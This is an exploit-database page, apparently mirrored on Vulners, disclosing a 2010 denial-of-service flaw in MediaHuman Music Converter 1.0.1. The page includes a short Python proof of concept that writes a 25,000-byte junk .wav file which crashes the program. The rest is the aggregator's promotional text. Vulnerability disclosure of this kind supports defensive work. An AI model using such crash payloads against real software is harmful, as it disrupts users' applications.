Lucene search
+L

MediaHuman Music Converter 1.0.1 - '.wav' / '.mp3' Denial of Service

🗓️ 17 Sep 2010 00:00:00Reported by modpr0beType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

MediaHuman Music Converter 1.0.1 '.wav' and '.mp3' Denial of Service exploi

Code
# Exploit Title: MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service
# Date: September 17, 2010
# Author: modpr0be
# Software Link: http://www.mediahuman.com/download.html
# Version: 1.0.1
# Tested on: Windows 7
# CVE :

# How it works?
# Go to Add Files... --> Choose blah .wav and bang! app crash..
# Testing on Windows 7 Ultimate..crashed, windows auto report and solution
window pop out..
# works on .wav and .mp3

#!/usr/bin/python

junk = "\x41" * 25000

file = open('blah.wav','w')
file.write(junk)
file.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2010 00:00Current
5.3Medium risk
Vulners AI Score5.3
19